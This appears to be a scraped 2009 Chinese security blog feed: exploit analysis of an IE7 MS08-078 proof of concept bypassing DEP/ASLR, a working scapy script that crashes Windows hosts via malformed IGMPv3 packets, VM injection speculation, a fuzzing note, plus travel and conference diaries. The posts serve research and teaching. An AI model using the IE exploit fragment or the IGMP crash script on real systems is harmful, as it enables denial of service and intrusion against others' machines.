<![CDATA[vessial's easylife]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/vessial zh-cn www.baidu.com 5 <![CDATA[How to Bypass DEP+ASLR+SEHOP]]> SSCON2009听TK讲了一个议题“安全漏洞的下一个十年,佩服TK的演讲的幽默风趣,MS一个

非常具有忽悠的议题讲的很生动,精彩,再次膜拜下,我个人觉得里面最精彩部分就在如下了,呵呵,

通过MS08-078这个去年的IE7的漏洞来介绍如何绕过windows现有的安全保护机制,很是受启发,因为

TK只有一张PPT的介绍,我在此想展开介绍的更详细点,和大家分享一下TK的研究成果:),未经TK

的同意,在此还要感谢下TK:)

我去年分析过这个漏洞,现在让我们看看,到底是如果绕过windows现有的DEP,ALSR,SEHOP这些安全

保护机制的。

if(wxp||w2k3)document.write(
'<XML ID=I><X><C>
<![CDATA[<image SRC=http://&#11C8;&#2570;.book.com src=http://www.google.com]]>
<![CDATA[>]]></C></X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>

漏洞细节就不介绍了,构造如此数据在这个Poc中

0x0a0a11c8

通过Heap spray在内存中填充0x7ffe027c这个值,为什么要填充如下值,下面会作介绍。


mshtml.dll CXfer::TransferFromSrc(void)
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18                                         ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18                                         ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg           = VARIANTARG ptr -18h
.text:461E3D18 var_8           = dword ptr -8
.text:461E3D18 var_4           = dword ptr -4
.text:461E3D18
.text:461E3D18                 mov     edi, edi
.text:461E3D1A                 push    ebp
.text:461E3D1B                 mov     ebp, esp
.text:461E3D1D                 sub     esp, 18h
.text:461E3D20                 push    ebx
.text:461E3D21                 push    esi
.text:461E3D22                 mov     esi, ecx
.text:461E3D24                 xor     ebx, ebx
.text:461E3D26                 test    byte ptr [esi+1Ch], 9
.text:461E3D2A                 jnz     loc_461E3E2E

.text:461E3D30                 mov     eax, [esi] //eax==0x0a0a11c8
.text:461E3D32                 cmp     eax, ebx
.text:461E3D34                 jz      loc_461E3E29
.text:461E3D3A                 cmp     [esi+4], ebx
.text:461E3D3D                 jz      loc_461E3E29
.text:461E3D43                 cmp     [esi+8], ebx
.text:461E3D46                 jz      loc_461E3E29
.text:461E3D4C                 mov     ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E                 push    edi
.text:461E3D4F                 push    eax //eax==0x0a0a11c8
.text:461E3D50                 call    dword ptr [ecx+84h] //call [0x7FFE027C+0x84], 换句话说就是call

[0x7ffe0300], 这是SharedUserData!SystemCallStub指针,这个指针里面存放着用户态进入内核态

ntdll!KiFastSystemCall函数的地址,也就是任何内核系统服务调用都会通过这个函数进入内核。

this call request for native API.// this call like call NtUserLockWorkStation for lock the windows:)


0:000> dd SharedUserData!SystemCallStub
7ffe0300  7c828608 7c82860c 00000000 00000000
7ffe0310  00000000 00000000 00000000 00000000
7ffe0320  00d2c763 00000000 00000000 00000000
7ffe0330  71724108 00000000 00000000 00000000
7ffe0340  00000000 00000000 00000000 00000000
7ffe0350  00000000 00000000 00000000 00000000
7ffe0360  00000000 00000000 00000000 00000000
7ffe0370  00000000 00000000 00000000 00000000

0:000> u 7c828608
ntdll!KiFastSystemCall:
7c828608 8bd4            mov     edx,esp
7c82860a 0f34            sysenter
ntdll!KiFastSystemCallRet:


我们再看看这个0x11c8这个值构造的用意,先让我们看看锁屏函数NtUserLockWorkStation,也就是直接

调用这个函数就是会实现锁屏功能。

0:000> u 773ddd0d
USER32!NtUserLockWorkStation:
773ddd0d b8c8110000      mov     eax,11C8h //
773ddd12 ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
773ddd17 ff12            call    dword ptr [edx]
773ddd19 c3              ret

我们再看看这个ie7的漏洞的片断
.text:461E3D46                 jz      loc_461E3E29
.text:461E3D4C                 mov     ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E                 push    edi
.text:461E3D4F                 push    eax //eax==0x0a0a11c8//这里的实现是不是跟NtUserLockWorkStation很
相似
.text:461E3D50                 call    dword ptr [ecx+84h] //call [0x7FFE027C+0x84]

也许大家会问NtUserLockWorkStation的代码片断是mov eax,0x11c8,而上面的代码的eax是0x0a0a11c8,

事实在内核中处理过程,来通过传入的eax的值来判断是哪个服务调用,其实只用了低两个字节,所以

0x0a0a11c8可以忽略高两个字节,对服务调用结果不影响,所以完全可以当成是执行了锁屏操作。

结论:

1.通过Heap spray注入内存的构造的数据绕过DEP,因为没有在堆上执行代码

2.绕过ASLR,是因为内核服务调用的入口地址是不会变化的,只要能够构造相应的内核调用需要用到的

参数,就可以执行类似这样的shellcode,但是局限性也很明显了,因为这样构造出来的shellcode功能很

有限,就像TK演示的那样,制造了一个锁屏的操作。

3.利用起来非常困难,但就理论上就对抗windows的这些安全保护机制,算是绕过了,呵呵:)

写的匆忙,多多包涵,再次感谢TK提供的这种想法:)
阅读全文
类别:漏洞分析 查看评论]]> 2009-11-14 17:02 http://hi.baidu.com/vessial/blog/item/962b7d1149d1d8cca6ef3f24.html <![CDATA[国庆中秋坝上骑行--(骑行篇)]]> 在luoluo同学和uu同学的诱惑下,8月底我也装了一辆自行车,然后就疯狂的爱上了这种运动,然后跟着

luoluo和uu上过门头沟的东方红隧道,黄花城水长城,香山,骑着自行车可以享受到被折磨的刺激,也许

你会觉得我这种想法很变态,当你经历长时间的骑行和错综复杂的路段,到达目的地后,你会获得无与伦比的

快感,长途骑行确实是一种自虐,因为你要经历肉体和心理上的摧残,有时候你会感觉到绝望,路漫漫其修

远兮,好了,不扯蛋了,西红柿臭鸡蛋上来了。

这次坝上之行,我已经策划了很久了,本来是约好同事朋友一起去的,后来国庆期间很多同事朋友都回家

了,期间我有放弃过的念头,心想一个人骑车,那是骑的是寂寞,前方路途未卜,形势很复杂,搞不好很容

易挂掉,不值,有点胆怯了,后来放假后, 一直思想斗争,一直用“你是不是男人”的句子激怒自已,一个人

就一个人吧,一个人也有一个人的精彩,于是中秋那天开始了我的长途骑行征程。

先show一把我的交通工具,人力单车:)






下午3点多的时候骑车去六里桥坐汽车去承德,主要是想着没必要浪费时间在北京到承德的路上,车票

花了73,单车放车上花了50,走京承高速,每个人又掏了10块,MD,坐汽车也真够黑的,算了,出去玩

也就不计较这些了。

晚上大概6,7点的样子到承德市区,那里温度比北京低多了,赶紧穿了长衣长裤,在火车站附近吃了一

碗牛肉拉面,5块,还挺便宜,吃完在承德市区溜达找旅店住下,看了好多家宾馆都挺贵的,看来去的时间

不对,正值黑人时,找了家宾馆,150的标间住下,洗澡,好好休息下,打算第二天开始我的新的征程,小

插曲,悲剧,自行车上的码表弄丢了,估计是放在汽车上的时候弄掉的,MD,“非战斗减员啊”,悲剧。

4号
大清早5点半起床,6点出发,承德市街头冷清的很,在去往双封寺镇的路上吃了半笼包子,喝了一碗

粥,继续前行,之前在地图上查了一下去塞罕(念kan)坝的路线图,不过真正走的时候还得注意那些

分岔路口。


先上几张承德的照片,和骑行途经的照片吧。


晕死,出现了不和谐的元素在我的镜头里面了。


清晨的承德街道。



已经到达了承德的郊外,向围场方向进发。



我的装备。



离那啥还有xx公里。


秋意正浓,很是怀念家乡收割水稻的情景。


自拍,形单影只,哥骑的不是车,是寂寞。


路标显示离围场还有老远的路要骑,到了围场还得骑个80多公里才能到塞罕坝上。

今夜无人伴我入眠。 阅读全文
类别:默认分类 查看评论]]> 2009-10-08 22:58 http://hi.baidu.com/vessial/blog/item/0cc8fd09bd8137c53ac763d9.html <![CDATA[Xcon 2009 -- 第一天]]> 一年一度的XCON又开始了,算了搞安全人的一个party吧,今天我也来扯点蛋,哈哈,莫怪哈,

一早过去,在大厅见到watercloud,alert7,san,flashsky,glacier(木马他爸),killer,还有

现在的一些同事,然后以前绿盟的兄弟,还有MS的安全同仁们,knownsec的同学们,还有一些朋

友,现场认识一些老外,然后现场扯蛋,哈哈,很是热闹啊,最引人注目的是一群以luoluo为首的

有组织“有预谋”的一小摄“B社会”组织---80sec,哈哈,那叫一个壮观啊,都是一身80sec自已设计的黑色T恤,很酷,哈

哈,我觉得应该是XCON上面回头率最高的组织了,哈哈,晚上有幸和80sec的弟兄们一起去"海底捞",

80sec的人真不简单,一个比一个能喝,哈哈,我不能喝,我就和阿里的墨西哥同学一起扯蛋(墨西哥

同学今天还有一个议题了,关于XSS的,讲的不错,可惜WEB安全是我的盲区,唉,还得努力学习啊),

还有云舒同学,有幸认识剑心同学,一袭长发,比较个性,我觉得他应该就是80sec的大佬了,那个

造型太适合做老大了,哈哈,对了,墨西哥同学筷子现在用得不错啊,哈哈,看来跟刺,云舒一起,

墨西哥同学估计已经被同化得差不多了,哈哈,刚见墨西哥同学的时候,用西班牙语打招呼,有意思,

墨西哥本土语言就是西班牙语,看来我学的几句西班牙语居然派上用场了。

-------该另起一段了----------------------

认识一个韩国的信息安全情报社的MM,具体的说应该是中年女性,中国说的那叫一个棒啊,居然

还懂中国的成语,我那叫一个“汗颜",后来她问我,”汗颜“是什么意思,我~!@#$%了,议题我没怎么

听,就听了一个孙冰的”固件升级之安全“,还有演示,非常不错,可以看得出他已经钻得很深了,很是

佩服,还有那个XSS,其它时间跟那外面那些人聊天了,其实我没有票的,在那儿混吃混喝,哈哈,

有点惭愧啊,主要是去认识人,聊天去了,都没怎么听议题了,明天继续混吃混喝,同去的顶上啊。
阅读全文
类别:默认分类 查看评论]]> 2009-08-18 21:48 http://hi.baidu.com/vessial/blog/item/25b80858336873d79d820406.html <![CDATA[Thunder-md5.h]]>
//抱歉我不是用的openssl里面的md5

//thunder-md5.h

#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
#define FF(a, b, c, d, x, s, ac) \
{(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) \
{(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) \
{(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) \
{(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
typedef unsigned long int UINT4;
/* Data structure for MD5 (Message-Digest) computation */
typedef struct {
UINT4 i[2];                   /* number of _bits_ handled mod 2^64 */
UINT4 buf[4];                                    /* scratch buffer */
unsigned char in[64];                              /* input buffer */
} MD5_CTX;

void MD5Init (MD5_CTX*);
void Transform (UINT4 *buf, UINT4 *in);
阅读全文
类别:协议分析 查看评论]]> 2009-08-13 09:52 http://hi.baidu.com/vessial/blog/item/f5eeac7a86c9e5e42f73b31a.html <![CDATA[TCPIP协议栈IGMP堆栈溢出本地拒绝服务攻击]]> 漏洞,可惜不能被利用,因为/GS编绎选项,可让自已蓝屏,仅作研究实习用,呵呵,看了作者写的poc,想自已用python实践一把,折腾了几天,
终于成功了,最近在做些Packet Hacking的研究,对以后的工作很有帮助,所以在学习scapy,一个非常强大的构造包的工具,强烈推荐给大家:)

下面就是用这个scapy写的IGMP local stack buffer overflow的POC:),非常简单的就实现了。
大家可以自已演示一下,可以把自已打蓝屏,哈哈。

# The IGMP Protocol Local D.O.S Poc
# Authored by Vessial 2009-7-27
# Contact Me: vessial@hotmail.com
#Don't used it for illegal things.
from scapy import *

a=IP(dst='192.168.72.2',src='
192.168.72.130',ttl=128,id=0,options='\xff\xff\xff\xff')
b=IGMPv3(type=0x11,mrcode=5,numsrc=100,gaddr='0.0.0.0')

for i in range(1000):
    b.srcaddrs.append('192.168.72.2')

c=a/b

s=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW)
s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
s.sendto(str(c),(a.dst,0))

就这么几行就蓝屏,强大吧:),注意必须是Raw socket,不然是不能成功的。

注意默认情况下的scapy里面是没有IGMP包的构造过程的,你得手动添加如下的
IGMP包结构定义和方法到scapy里面去.

##
##IGMP Protocol
##
igmptypes = { 0x11 : "Group Membership Query",
              0x12 : "Version 1 - Membership Report",
              0x16 : "Version 2 - Membership Report",
              0x17 : "Leave Group"}

class IGMP(Packet):
"""IGMP Message Class for v1 and v2.

This class is derived from class Packet. You may need to "sanitize" the IP
and Ethernet headers before a full packet is sent.

"""
name = "IGMP"
fields_desc = [ ByteEnumField("type", 0x11, igmptypes),
                      ByteField("mrtime",0),
                    XShortField("chksum", None),
                        IPField("gaddr", "0.0.0.0")]

#-----------------------------
-------------------------------------------------
def post_build(self, p, pay):
    """Called implicitly before a packet is sent to compute and place IGMP checksum.

    Parameters:
      self    The instantiation of an IGMP class
      p       The IGMP message in hex in network byte order
      pay     Additional payload for the IGMP message
    """
    p += pay
    if self.chksum is None:
      ck = checksum(p)
      p = p[:2]+chr(ck>>8)+chr(ck&0xff)+p[4:]
    return p

#------------------------------------------------------------------------------
def mysummary(self):
    """Display a summary of the IGMP object."""

    if isinstance(self.underlayer, IP):
      return self.underlayer.sprintf("IGMP: %IP.src% > %IP.dst% %IGMP.type% %IGMP.gaddr%")
    else:
      return self.sprintf("IGMP %IGMP.type% %IGMP.gaddr%")

#------------------------------------------------------------------------------
def sanitize (self, ip=None, ether=None):
    """Called to explicitely fixup associated IP and Ethernet headers

    Parameters:
      self    The instantiation of an IGMP class.
      ip      The instantiation of the associated IP class.
      ether   The instantiation of the associated Ethernet.

    Returns:
      True    The tuple ether/ip/self passed all check and represents a proper
              IGMP packet.
      False   One of more validation checks failed and no fields were adjusted.

    The function will examine the IGMP message to assure proper format.
    Corrections will be attempted if possible. The IP header is then properly
    adjusted to ensure correct formatting and assignment. The Ethernet header
    is then adjusted to the proper IGMP packet format.
    """

# The rules are:
#   1. the Max Response time is meaningful only in Membership Queries and should be zero
#       otherwise (RFC 2236, section 2.2)
    if (self.type != 0x11):         #rule 1
      self.mrtime = 0
    if (self.adjust_ip(ip) == True):
      if (self.adjust_ether(ip, ether) == True): return True
    return False

#------------------------------------------------------------------------------
def adjust_ether (self, ip=None, ether=None):
    """Called to explicitely fixup an associated Ethernet header

    Parameters:
      self    The instantiation of an IGMP class.
      ip      The instantiation of the associated IP class.
      ether   The instantiation of the associated Ethernet.

    Returns:
      True    The tuple ether/ip/self passed all check and represents a proper
              IGMP packet.
      False   One of more validation checks failed and no fields were adjusted.

    The function adjusts the ethernet header destination MAC address based on
    the destination IP address.
    """
# The rules are:
#   1. send the packet to the group mac address address corresponding to the IP
    if ip != None and ip.haslayer(IP) and ether != None and ether.haslayer(Ether):
      ipaddr = socket.ntohl(atol(ip.dst)) & 0x007FFFFF
      macstr = "01:5e:00:%02x:%02x:%02x" %((ipaddr>>16)&0xFF, (ipaddr>>8)&0xFF, (ipaddr>>0)&0xFF)
      ether.dst=macstr
      return True
    else:
      return False

#------------------------------------------------------------------------------
def adjust_ip (self, ip=None):
    """Called to explicitely fixup an associated IP header

    Parameters:
      self    The instantiation of an IGMP class.
      ip      The instantiation of the associated IP class.

    Returns:
      True    The tuple ip/self passed all checks and represents a proper
              IGMP packet.
      False   One of more validation checks failed and no fields were adjusted.

    The function adjusts the IP header based on conformance rules and the group
    address encoded in the IGMP message.
    """
# The rules are:
#   1. send the packet to the group address registering/reporting for
#     a. for General Group Query, send packet to 224.0.0.1 (all systems)
#   2. send the packet with the router alert IP option (RFC 2236, section 2)
#   3. ttl = 1 (RFC 2236, section 2)
    if ip != None and ip.haslayer(IP):
      if (self.type == 0x11):
        if (self.gaddr == "0.0.0.0"):
          ip.dst = "224.0.0.1"
          retCode = True                    
        elif (atol(self.gaddr)&0xff >= 224) and (atol(self.gaddr)&0xff <= 239):
          ip.dst = self.gaddr
          retCode = True
        else:
          retCode = False
      elif ((self.type == 0x12) or (self.type == 0x16) or (self.type == 0x17)) and \
           (atol(self.gaddr)&0xff >= 224) and (atol(self.gaddr)&0xff <= 239):
          ip.dst = self.gaddr
          retCode = True
      elif (self.type == 0x22):
        ip.dst = "224.0.0.22"
        retCode = True
      elif (self.type == 0x30) or (self.type == 0x32):
        ip.dst = "224.0.0.106"
        retCode = True
      elif (self.type == 0x31):
        ip.dst = "224.0.0.2"
        retCode = True
      else:
        retCode = False
    else:
      retCode = False
    if retCode == True:
      ip.options="\x94\x04\x00\x00" # set IP Router Alert option
    return retCode

#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#
# See RFC3376, Section 4. Message Formats for definitions of proper IGMPv3 message format
#   http://www.faqs.org/rfcs/rfc3376.html
#
# See RFC4286, For definitions of proper messages for Multicast Router Discovery.
#   http://www.faqs.org/rfcs/rfc4286.html
#

igmpv3grtypes = { 1 : "Mode Is Include",
                  2 : "Mode Is Exclude",
                  3 : "Change To Include Mode",
                  4 : "Change To Exclude Mode",
                  5 : "Allow New Sources",
                  6 : "Block Old Sources"}

class IGMPv3gr(Packet):
"""IGMP Group Record for IGMPv3 Membership Report

This class is derived from class Packet and should be concatenated to an
instantiation of class IGMPv3. Within the IGMPv3 instantiation, the numgrp
element will need to be manipulated to indicate the proper number of
group records.
"""
name = "IGMPv3gr"
fields_desc = [ ByteEnumField("rtype", 1, igmpv3grtypes),
                      ByteField("auxdlen",0),
                  FieldLenField("numsrc", None, "srcaddrs"),
                        IPField("maddr", "0.0.0.0"),
                 FieldListField("srcaddrs", None, IPField("sa", "0.0.0.0"), "numsrc") ]
show_indent=0
#------------------------------------------------------------------------------
def post_build(self, p, pay):
    """Called implicitly before a packet is sent.
    """
    p += pay
    if self.auxdlen != 0:
      print "NOTICE: A properly formatted and complaint V3 Group Record should have an Auxiliary Data length of zero (0)."
      print "        Subsequent Group Records are lost!"
    return p
#------------------------------------------------------------------------------
def mysummary(self):
    """Display a summary of the IGMPv3 group record."""
    return self.sprintf("IGMPv3 Group Record %IGMPv3gr.type% %IGMPv3gr.maddr%")

igmpv3types = { 0x11 : "Membership Query",
                0x22 : "Version 3 Membership Report",
                0x30 : "Multicast Router Advertisement",
                0x31 : "Multicast Router Solicitation",
                0x32 : "Multicast Router Termination"}

class IGMPv3(IGMP):
"""IGMP Message Class for v3.

This class is derived from class Packet.
The fields defined below are a
direct interpretation of the v3 Membership Query Message.
Fields 'type' through 'qqic' are directly assignable.
For 'numsrc', do not assign a value.
Instead add to the 'srcaddrs' list to auto-set 'numsrc'. To
assign values to 'srcaddrs', use the following methods:
    c = IGMPv3()
    c.srcaddrs = ['1.2.3.4', '5.6.7.8']
    c.srcaddrs += ['192.168.10.24']
At this point, 'c.numsrc' is three (3)

'chksum' is automagically calculated before the packet is sent.

'mrcode' is also the Advertisement Interval field

"""
name = "IGMPv3"
fields_desc = [ ByteEnumField("type", 0x11, igmpv3types),
                      ByteField("mrcode",0),              # use float_encode()
                    XShortField("chksum", None),
    # if type = 0x11 (Membership Query), the next field is group address
    ConditionalField(IPField("gaddr", "0.0.0.0"),lambda pkt:pkt.type==0x11),
    # else if type = 0x22 (Membership Report), the next fields are
    #         reserved and number of group records
    ConditionalField(ShortField("rsvd2", 0),lambda pkt:pkt.type==0x22),
    ConditionalField(ShortField("numgrp", 0),lambda pkt:pkt.type==0x22),
#                  FieldLenField("numgrp", None, "grprecs")]
    # else if type = 0x30 (Multicast Router Advertisement), the next fields are
    #         query interval and robustness
    ConditionalField(ShortField("qryIntvl", 0),lambda pkt:pkt.type==0x30),
    ConditionalField(ShortField("robust", 0),lambda pkt:pkt.type==0x30),
# The following are only present for membership queries
          ConditionalField(BitField("resv", 0, 4),lambda pkt:pkt.type==0x11),
          ConditionalField(BitField("s", 0, 1),lambda pkt:pkt.type==0x11),
          ConditionalField(BitField("qrv", 0, 3),lambda pkt:pkt.type==0x11),
         ConditionalField(ByteField("qqic",0),lambda pkt:pkt.type==0x11),
     ConditionalField(FieldLenField("numsrc", None, "srcaddrs"),lambda pkt:pkt.type==0x11),
    ConditionalField(FieldListField("srcaddrs", None, IPField("sa", "0.0.0.0"), "numsrc"),lambda pkt:pkt.type==0x11),
    ]


#------------------------------------------------------------------------------
def float_encode(self, value):
    """Convert the integer value to its IGMPv3 encoded time value if needed.
   
    If value < 128, return the value specified. If >= 128, encode as a floating
    point value. Value can be 0 - 31744.
    """
    if value < 128:
        code = value
    elif value > 31743:
        code = 255
    else:
        exp=0
        value>>=3
        while(value>31):
            exp+=1
            value>>=1
            exp<<=4
            code = 0x80 | exp | (value & 0x0F)
            return code
       
#------------------------------------------------------------------------------
def post_build(self, p, pay):
    """Called implicitly before a packet is sent to compute and place IGMPv3 checksum.

    Parameters:
      self    The instantiation of an IGMPv3 class
      p       The IGMPv3 message in hex in network byte order
      pay     Additional payload for the IGMPv3 message
    """
    p += pay
    if self.type in [0, 0x31, 0x32, 0x22]:   # for these, field is reserved (0)
      p = p[:1]+chr(0)+p[2:]
    if self.chksum is None:
      ck = checksum(p)
      p = p[:2]+chr(ck>>8)+chr(ck&0xff)+p[4:]
    return p
#------------------------------------------------------------------------------
def mysummary(self):
    """Display a summary of the IGMPv3 object."""
   
    if isinstance(self.underlayer, IP):
        return self.underlayer.sprintf("IGMPv3: %IP.src% > %IP.dst% %IGMPv3.type% %IGMPv3.gaddr%")
    else:
        return self.sprintf("IGMPv3 %IGMPv3.type% %IGMPv3.gaddr%")
    # The rules are:
    #   1. ttl = 1 (RFC 2236, section 2)
igmp_binds = [ (IP, IGMP,   { "proto": 2 , "ttl": 1 }),
        #   2. tos = 0xC0 (RFC 3376, section 4)
        (IP, IGMPv3, { "proto": 2 , "ttl": 1, "tos":0xc0 }),
        (IGMPv3, IGMPv3gr, { }) ]
阅读全文
类别:Packet Hacking 查看评论]]> 2009-07-31 14:29 http://hi.baidu.com/vessial/blog/item/a35496f4d67c43e67709d7b6.html <![CDATA[关于虚拟机从Host OS注入到Guest OS的猜想]]>      这些天注意到blackhat 2009一个关于虚拟机agent端注入在Guest OS里面执行代码的议题,演讲者是

symantec的matt conover,大体思想是讲从host os注入到代码到VM的agent里面,然后在guest os里面执行

代码的这么一个过程,现在我也不知道他是怎么实现的,但是我把我自已的猜想和大家分享一下,看看

是否行得通,去年在安全软件峰会上听过孙冰讲的虚拟机技术,他算得上是虚拟机大拿了,所以关于这个

黑帽子上面的这个议题想必也有研究了,废话不说了,切入正题。

      
     我如下讲的VM是指VMware这个软件,VM软件其实没有完全虚拟化所用的CPU指令,因为它要考虑到

虚拟机里面操作系统的运行速度和效率,也就是说,Guest OS有时是可以直接访问硬件系统的,而不通过

Host OS进行指令虚拟化,这样就大大提高了Guest OS运行的速度,当然我也并不知道到底哪些CPU指令,

或者中断调用没有进行虚拟化,暂且我们认为存在这样的CPU指令或者中断调用或者系统调用之类的东西,

所以当虚拟机里面的Guest OS直接执行这些指令或者中断调用或者系统调用之类的东西时,我们可以截获

到这种动作,怎么讲呢? 我们可以通过在Host OS里面编写驱动截获到这些指令或者中断,或者系统调用

之类的动作,hook这些指令,在我们的hook例程里面注入shellcode, 这样可以让Guest OS执行你的

shellcode了,虽然这个注入shellcode注入执行说起来简单,但做起来的时候,还得考虑很多问题,当然

这已经不在这里的讨论范围了, 我简单的画了一个草图关于虚拟机Host OS注入到Guest OS的过程。

简单描述就是截持Guest OS直接访问硬件的行为,hook注入shellcode。不知道大家是怎么想的,可以

邮件交流讨论下:)


阅读全文
类别:调试技术 查看评论]]> 2009-07-01 16:03 http://hi.baidu.com/vessial/blog/item/f97423019ae0c70a728da515.html <![CDATA[MP4解码器漏洞挖掘手法]]> 对于格式漏洞最容易出现的就是死循环,所以对于这种漏洞的查找方法,我个人方法是人肉(开玩笑),关注那些函数里面使用循环操作的代码,然后构造样本测试,当然首先你得确保你得让程序可以走到这里来,可以让它测试你觉得它有问题的代码,这就涉及到一个你所测试的这个程序所支持的文件格式,了解它的文件的数据结构,然后在调试的时候构造数据,测试,这样漏洞出现频率最高也就是CPU消耗100%,crash之类的,呵呵,可利用的得看人品了,呵呵.
下面的这个循环,就可以构造相应的媒体文件,让它死循环。

还有这儿
.text:10005030
.text:10005030 vuln_here:                              ; CODE XREF: sub_10004FF0+35 j
.text:10005030                                         ; sub_10004FF0+18B j
.text:10005030                 mov     ecx, [esi+2A8h]
.text:10005036                 mov     [esp+2Ch+var_1C], 0
.text:1000503E                 mov     eax, [ecx+34h]
.text:10005041                 test    eax, eax
.text:10005043                 mov     ebx, 8000h
.text:10005048                 jnz     loc_10005162
.text:1000504E                 mov     eax, [ecx+30h]
.text:10005051                 test    eax, eax
.text:10005053                 jz      loc_10005162
.text:10005059                 lea     edx, [esp+2Ch+var_1C]
.text:1000505D                 push    edx
.text:1000505E                 call    sub_100089A0
.text:10005063                 cmp     eax, ebx
.text:10005065                 jl      loc_10005162
.text:1000506B                 lea     ebp, [esi+2B0h]
.text:10005071                 push    ebp             ; lpCriticalSection
.text:10005072                 mov     [esp+30h+var_10], ebp
.text:10005076                 call    ds:EnterCriticalSection
.text:1000507C                 mov     ecx, [esi+2A8h]
.text:10005082                 lea     eax, [esp+2Ch+var_1C]
.text:10005086                 push    eax
.text:10005087                 mov     [esp+30h+var_4], 0
.text:1000508F                 call    sub_100089A0
.text:10005094                 cmp     eax, ebx
.text:10005096                 jl      loc_10005151
.text:1000509C                 mov     edx, [esi+28Ch]
.text:100050A2                 mov     eax, [esi+284h]
.text:100050A8                 cmp     edx, eax
.text:100050AA                 mov     edi, [esi+288h]
.text:100050B0                 mov     ecx, [esi+280h]
.text:100050B6                 jg      short loc_100050D4
.text:100050B8                 jl      short loc_100050BE
.text:100050BA                 cmp     edi, ecx
.text:100050BC                 jnb     short loc_100050D4
.text:100050BE
.text:100050BE loc_100050BE:                           ; CODE XREF: sub_10004FF0+C8 j
.text:100050BE                 sub     ecx, edi
.text:100050C0                 sbb     eax, edx
.text:100050C2                 test    eax, eax
.text:100050C4                 jg      short loc_100050D9
.text:100050C6                 jl      short loc_100050D0
.text:100050C8                 cmp     ecx, 8000h
.text:100050CE                 jnb     short loc_100050D9
.text:100050D0
.text:100050D0 loc_100050D0:                           ; CODE XREF: sub_10004FF0+D6 j
.text:100050D0                 mov     ebx, ecx
.text:100050D2                 jmp     short loc_100050D9
.text:100050D4 ; ---------------------------------------------------------------------------
.text:100050D4
.text:100050D4 loc_100050D4:                           ; CODE XREF: sub_10004FF0+C6 j
.text:100050D4                                         ; sub_10004FF0+CC j
.text:100050D4                 mov     ebx, 800h
.text:100050D9
.text:100050D9 loc_100050D9:                           ; CODE XREF: sub_10004FF0+D4 j
.text:100050D9                                         ; sub_10004FF0+DE j ...
.text:100050D9                 mov     eax, [esp+2Ch+var_1C]
.text:100050DD                 test    eax, eax
.text:100050DF                 jz      short loc_10005151
.text:100050E1                 lea     ecx, [esp+2Ch+var_14]
.text:100050E5                 push    ecx
.text:100050E6                 push    eax
.text:100050E7                 push    ebx
.text:100050E8                 push    edx
.text:100050E9                 push    edi
.text:100050EA                 lea     ecx, [esi+0D0h]
.text:100050F0                 mov     [esp+40h+var_14], 0
.text:100050F8                 call    sub_100066E0
.text:100050FD                 mov     edi, eax
.text:100050FF                 test    edi, edi
.text:10005101                 jnz     short loc_10005143
.text:10005103                 mov     ecx, [esp+2Ch+var_14]
.text:10005107                 mov     ebx, [esi+288h]
.text:1000510D                 mov     edi, [esi+28Ch]
.text:10005113                 mov     eax, ecx
.text:10005115                 cdq
.text:10005116                 add     ebx, eax
.text:10005118                 adc     edi, edx
.text:1000511A                 push    ecx
.text:1000511B                 mov     ecx, [esi+2A8h]
.text:10005121                 mov     [esi+288h], ebx
.text:10005127                 mov     [esi+28Ch], edi
.text:1000512D                 call    sub_10008A00
.text:10005132                 push    ebp             ; lpCriticalSection
.text:10005133                 mov     [esp+30h+var_4], 0FFFFFFFFh
.text:1000513B                 call    ds:LeaveCriticalSection
.text:10005141                 jmp     short loc_1000516A
.text:10005143 ; ---------------------------------------------------------------------------
.text:10005143
.text:10005143 loc_10005143:                           ; CODE XREF: sub_10004FF0+111 j
.text:10005143                 cmp     edi, 1
.text:10005146                 jnz     short loc_100051C4
.text:10005148                 mov     eax, [esi+2A8h]
.text:1000514E                 mov     [eax+34h], edi
.text:10005151
.text:10005151 loc_10005151:                           ; CODE XREF: sub_10004FF0+A6 j
.text:10005151                                         ; sub_10004FF0+EF j
.text:10005151                 push    ebp             ; lpCriticalSection
.text:10005152                 mov     [esp+30h+var_4], 0FFFFFFFFh
.text:1000515A                 call    ds:LeaveCriticalSection
.text:10005160                 jmp     short loc_1000516A
.text:10005162 ; ---------------------------------------------------------------------------
.text:10005162
.text:10005162 loc_10005162:                           ; CODE XREF: sub_10004FF0+58 j
.text:10005162                                         ; sub_10004FF0+63 j ...
.text:10005162                 push    1               ; dwMilliseconds
.text:10005164                 call    ds:Sleep
.text:1000516A
.text:1000516A loc_1000516A:                           ; CODE XREF: sub_10004FF0+151 j
.text:1000516A                                         ; sub_10004FF0+170 j
.text:1000516A                 lea     edx, [esp+2Ch+var_18]
.text:1000516E                 lea     edi, [esi+70h]
.text:10005171                 push    edx
.text:10005172                 mov     ecx, edi
.text:10005174                 call    sub_1000F810
.text:10005179                 test    eax, eax //eax 始终为0
